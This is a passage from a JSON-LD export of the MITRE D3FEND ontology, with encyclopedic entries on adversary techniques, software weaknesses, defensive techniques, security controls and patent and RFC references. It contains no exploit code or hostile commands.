      "d3f:attack-id": "T1484",
      "d3f:definition": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.",
      "d3f:modifies": {
        "@id": "d3f:GroupPolicy"
      },
      "rdfs:label": "Domain or Tenant Policy Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N2d2e5ed3b65645549f167c51fa19185e"
        }
      ]
    },
    {
      "@id": "_:N2d2e5ed3b65645549f167c51fa19185e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:next",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "next",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:T1550.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.001",
      "d3f:definition": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.",
      "d3f:may-produce": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:uses": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Application Access Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:Nb0edd2ea9b184d86a2c920b9b8943e71"
        },
        {
          "@id": "_:Ndcc7d46666f2413981a975cec2f5ab40"
        }
      ]
    },
    {
      "@id": "_:Nb0edd2ea9b184d86a2c920b9b8943e71",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:Ndcc7d46666f2413981a975cec2f5ab40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:Clipboard",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The clipboard is a buffer that some operating systems provide for short-term storage and transfer within and between application programs. The clipboard is usually temporary and unnamed, and its contents reside in the computer's RAM. The clipboard is sometimes called the paste buffer. Windows, Linux and macOS support a single clipboard transaction. Each cut or copy overwrites the previous contents. Normally, paste operations copy the contents, leaving the contents available in the clipboard for further pasting.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Clipboard_(computing)"
      },
      "rdfs:label": "Clipboard",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1498.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1498.002",
      "d3f:definition": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.",
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Reflection Amplification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "_:Nd16bd31f968049d8a383aa29aba206ee"
        }
      ]
    },
    {
      "@id": "_:Nd16bd31f968049d8a383aa29aba206ee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account allows a user to authenticate to a system and potentially to receive authorization to access resources provided by or connected to that system; however, authentication does not imply authorization. To log into an account, a user is typically required to authenticate oneself with a password or other credentials for the purposes of accounting, security, logging, and resource management.",
      "d3f:identified-by": {
        "@id": "d3f:DigitalIdentity"
      },
      "d3f:used-by": {
        "@id": "d3f:Agent"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/User_(computing)#User_account"
      },
      "rdfs:label": "User Account",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:User_account"
        },
        {
          "@id": "https://schema.ocsf.io/objects/user"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N9af0da3f71a54b95af2e8c6f32e5ca32"
        },
        {
          "@id": "_:N10e59d5abceb43c7b21cab62d3b52472"
        }
      ]
    },
    {
      "@id": "_:N9af0da3f71a54b95af2e8c6f32e5ca32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalIdentity"
      }
    },
    {
      "@id": "_:N10e59d5abceb43c7b21cab62d3b52472",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:used-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:T1413",
      "@type": "owl:Class",
      "d3f:attack-id": "T1413",
      "d3f:definition": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Access Sensitive Data in Device Logs - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Access Sensitive Data in Device Logs"
    },
    {
      "@id": "d3f:T1671",
      "@type": "owl:Class",
      "d3f:attack-id": "T1671",
      "d3f:definition": "Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends.(Citation: Push Security SaaS Persistence 2022)(Citation: SaaS Attacks GitHub Evil Twin Integrations)",
      "rdfs:label": "Cloud Application Integration",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6550012B1"
      },
      "d3f:kb-abstract": "System and methodology providing automated or \"proactive\" network security (\"active\" firewall) are described. The system implements methodology for verifying or authenticating communications, especially between network security components thereby allowing those components to share information. In one embodiment, a system implementing an active firewall is provided which includes methodology for verifying or authenticating communications between network components (e.g., sensor(s), arbiter, and actor(s)), using cryptographic keys or digital certificates. Certificates may be used to digitally sign a message or file and, in a complementary manner, to verify a digital signature. At the outset, particular software components that may participate in authenticated communication are specified, including creating a digital certificate for each such software component. Upon detection by a sensor that an event of interest that has occurred in the computer network system, the system may initiate authenticated communication between the sensor component and a central arbiter (e.g., \"event orchestrator\") component, so that the sensor may report the event to the arbiter or \"brain.\" Thereafter, the arbiter (if it chooses to act on that information) initiates authenticated communication between itself and a third software component, an \"actor\" component (e.g., \"firewall\"). The arbiter may indicate to the actor how it should handle the event. The actor or firewall, upon receiving the information, may now undertake appropriate action, such as dynamically creating or modifying rules for appropriately handling the event, or it may choose to simply ignore the information.",
      "d3f:kb-author": "Emilio Villa, Adrian Zidaritz, Michael David Varga, Gerhard Eschelbeck, Michael Kevin Jones, Mark James McArdle",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Active firewall system and methodology",
      "rdfs:label": "Reference - Active firewall system and methodology - McAfee LLC"
    },
    {
      "@id": "d3f:DigitalInformation",
      "@type": "owl:Class",
      "d3f:definition": "Digital information is a broad category of encoded representations in digital form that convey meaning, instructions, or functionality.",
      "rdfs:label": "Digital Information",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:MemoryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing operations on the memory resources of a system, encompassing allocation, modification, access, protection, or deallocation.",
      "rdfs:label": "Memory Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/memory_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N53c505cc40fb4673834284041cbc3bf4"
        },
        {
          "@id": "_:Nf58073eb11994873aa10f8d8de8853bd"
        }
      ]
    },
    {
      "@id": "_:N53c505cc40fb4673834284041cbc3bf4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "_:Nf58073eb11994873aa10f8d8de8853bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:CWE-1265",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1265",
      "d3f:definition": "During execution of non-reentrant code, the product performs a call that unintentionally produces a nested invocation of the non-reentrant code.",
      "rdfs:label": "Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:d3fend-process-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-process-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:CWE-1192",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1192",
      "d3f:definition": "The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components.",
      "rdfs:label": [
        "Improper Identifier for IP Block used in System-On-Chip (SOC)",
        "System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:d3fend-tactical-verb-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-tactical-verb-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc6376"
      },
      "d3f:kb-abstract": "DomainKeys Identified Mail (DKIM) permits a person, role, or organization that owns the signing domain to claim some responsibility for a message by associating the domain with the message.  This can be an author's organization, an operational relay, or one of their agents.  DKIM separates the question of the identity of the Signer of the message from the purported author of the message.  Assertion of responsibility is validated through a\ncryptographic signature and by querying the Signer's domain directly\nto retrieve the appropriate public key.  Message transit from author to recipient is through relays that typically make no substantive change to the message content and thus preserve the DKIM signature.",
      "d3f:kb-author": "D. Crocker, T. Hansen, M. Kucherawy",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 6376: DomainKeys Identified Mail (DKIM) Signatures",
      "rdfs:label": "Reference - RFC 6376: DomainKeys Identified Mail (DKIM) Signatures - IETF"
    },
    {
      "@id": "d3f:InternetArticleReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Internet Article",
      "rdfs:label": "Internet Article Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      },
      "skos:altLabel": "Internet Blog Reference"
    },
    {
      "@id": "d3f:EX-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008.01",
      "d3f:definition": "Execution is keyed to a fixed wall-clock timestamp or epoch, independent of current vehicle state. The implant watches a trusted time source, GNSS-derived time, crosslink-distributed network time, oscillator-disciplined UTC/TAI, or mission elapsed time anchored at activation, and triggers exactly at a programmed date/time. Absolute triggering supports coordinated multi-asset actions and allows long dormancy with a precise activation moment. Variants incorporate calendar logic (e.g., “first visible pass after YYYY-MM-DD hh:mm:ss”) or guard bands to fire only if the clock is within certain tolerances, ensuring the event occurs even with minor drift yet remains rare enough to blend with scheduled operations.",
      "rdfs:label": "Absolute Time Sequences - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0008"
      },
      "skos:prefLabel": "Absolute Time Sequences"
    },
    {
      "@id": "d3f:T1165",
      "@type": "owl:Class",
      "d3f:attack-id": "T1165",
      "d3f:definition": "Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1037.005",
      "rdfs:label": "Startup Items",
      "rdfs:seeAlso": {
        "@id": "d3f:T1037.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1608.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.002",
      "d3f:definition": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.",
      "rdfs:label": "Upload Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:AML.T0037",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0037",
      "d3f:definition": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nThis can include basic fingerprinting information and sensitive data such as ssh keys.",
      "rdfs:label": "Data from Local System - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0037"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:ProcessCodeSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "A process code segment, also known as a text segment or simply as text, is a portion of the program's virtual address space that contains executable instructions and corresponds to the loaded image code segment. Includes additional sections such as an import table.",
      "d3f:may-contain": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Process Code Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ImageCodeSegment"
        },
        {
          "@id": "dbr:Code_segment"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "_:N017158c0c6c24b0c829b2fb83eec17ce"
        },
        {
          "@id": "_:N35b01fe58f514c96965ef8f07e56a820"
        }
      ],
      "skos:altLabel": "Process Text Segment"
    },
    {
      "@id": "_:N017158c0c6c24b0c829b2fb83eec17ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N35b01fe58f514c96965ef8f07e56a820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1003.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1003.003",
      "d3f:definition": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)",
      "rdfs:label": "NTDS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N5f1a9d0d963742b18badfa6cf6af428f"
        }
      ]
    },
    {
      "@id": "_:N5f1a9d0d963742b18badfa6cf6af428f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "d3f:CWE-23",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-23",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \"..\" that can resolve to a location that is outside of that directory.",
      "d3f:synonym": "Zip Slip",
      "rdfs:label": "Relative Path Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-22"
      }
    },
    {
      "@id": "d3f:ST0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to move through across sub-systems of the spacecraft.",
      "d3f:display-order": 7,
      "rdfs:label": "Lateral Movement - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0007"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_21",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Physical or Logical Separation of Information Flows",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(21)"
    },
    {
      "@id": "d3f:CCI-002306_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002306"
    },
    {
      "@id": "d3f:CWE-200",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-200",
      "d3f:definition": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.",
      "d3f:synonym": [
        "Information Disclosure",
        "Information Leak"
      ],
      "rdfs:label": "Exposure of Sensitive Information to an Unauthorized Actor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ResourceAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ResourceAccessPatternAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:d3fend-id": "D3-RAPA",
      "d3f:definition": "Analyzing the resources accessed by a user to identify unauthorized activity.",
      "d3f:kb-article": "## How it works\nThis technique analyzes a user's resource accesses by comparing the user's recent activity against a baseline activity model. Major differences between the current activity and the baseline model might indicate unauthorized activity if they are severe enough.\n\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers that move low and slow may not differentiate their resource access activity behavior enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-ModelingUserAccessToComputerResources_DaedalusGroupLLC"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Resource Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N207b7ae582204268be684bc125702b88"
        },
        {
          "@id": "_:Nb66a28cabd2946a6b3a6118038cc78ec"
        }
      ]
    },
    {
      "@id": "_:N207b7ae582204268be684bc125702b88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nb66a28cabd2946a6b3a6118038cc78ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-004%3ABITSJobPersistence_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-004/"
      },
      "d3f:kb-abstract": "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use bitsadmin /list /verbose to list out the jobs during investigation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-004: BITS Job Persistence",
      "rdfs:label": "Reference - CAR-2021-05-004: BITS Job Persistence - MITRE"
    },
    {
      "@id": "d3f:REC-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.02",
      "d3f:definition": "Threat actors enumerate the software factory: where source lives, how dependencies are pulled, how artifacts are built, signed, stored, and promoted to flight. They inventory repos and access models, CI/CD orchestrators, build containers and base images, package registries, signing services/HSMs, update channels, and the policies that gate promotion (tests, reviews, attestations). With this, an adversary can plan dependency confusion or typosquatting attacks, modify build scripts, poison cached artifacts, or swap binaries at distribution edges (mirrors, CDN, ground station staging).",
      "rdfs:label": "Software Recon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Software Recon"
    },
    {
      "@id": "d3f:M1047",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1047 scope is broad, touches on an wide variety of techniques in d3fend.",
      "d3f:related": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemFileAnalysis"
        }
      ],
      "rdfs:label": "Audit"
    },
    {
      "@id": "d3f:T1574.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.001",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N57b60b508a29447bb805d3abcf67967c"
        }
      ]
    },
    {
      "@id": "_:N57b60b508a29447bb805d3abcf67967c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:HomoglyphDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HomoglyphDenylisting"
      ],
      "d3f:d3fend-id": "D3-HDL",
      "d3f:definition": "Blocking DNS queries that are deceptively similar to legitimate domain names.",
      "d3f:kb-article": "## How it works\n\nHomoglyph domain blacklisting considers the domain and subdomain structure of a lookup and compares the named components to blacklisted named components. The blacklisted named components are typically crafted modifications of known good domains, e.g., gooogle.com versus google.com. The blacklisted domains typically resemble trusted domains, but have been altered slightly to deceive users.\n\nThe blacklisted named components also include consideration for fonts or Unicode characters that can make certain characters appear very similar (zero vs capital O and the letter l vs the number one). The blacklisted domains under certain fonts will appear to be a trusted domain.\n\n## Considerations\n* Maintaining the currency of the list can be a challenge especially with newly registered domain entries.\n* Blacklists should have identified maintenance cycles to ensure lists are not stale.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectionOfMaliciousIDNHomoglyphDomains"
      },
      "d3f:synonym": "Homoglyph Blacklisting",
      "rdfs:label": "Homoglyph Denylisting",
      "rdfs:subClassOf": {
        "@id": "d3f:ForwardResolutionDomainDenylisting"
      }
    },
    {
      "@id": "d3f:CWE-1288",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1288",
      "d3f:definition": "The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.",
      "rdfs:label": "Improper Validation of Consistency within Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-367",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-367",
      "d3f:definition": "The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the product to perform invalid actions when the resource is in an unexpected state.",
      "d3f:synonym": [
        "TOCCTOU",
        "TOCTTOU"
      ],
      "rdfs:label": "Time-of-check Time-of-use (TOCTOU) Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:AML.TA0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0004",
      "d3f:definition": "The adversary is trying to gain access to the AI system.\n\nThe target system could be a network, mobile device, or an edge device such as a sensor platform.\nThe AI capabilities used by the system could be local with onboard or cloud-enabled AI capabilities.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.",
      "rdfs:label": "Initial Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:CCI-001399_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001399"
    },
    {
      "@id": "d3f:T1595.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.003",
      "d3f:definition": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).",
      "rdfs:label": "Wordlist Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:CWE-1302",
      "@type": "owl:Class",
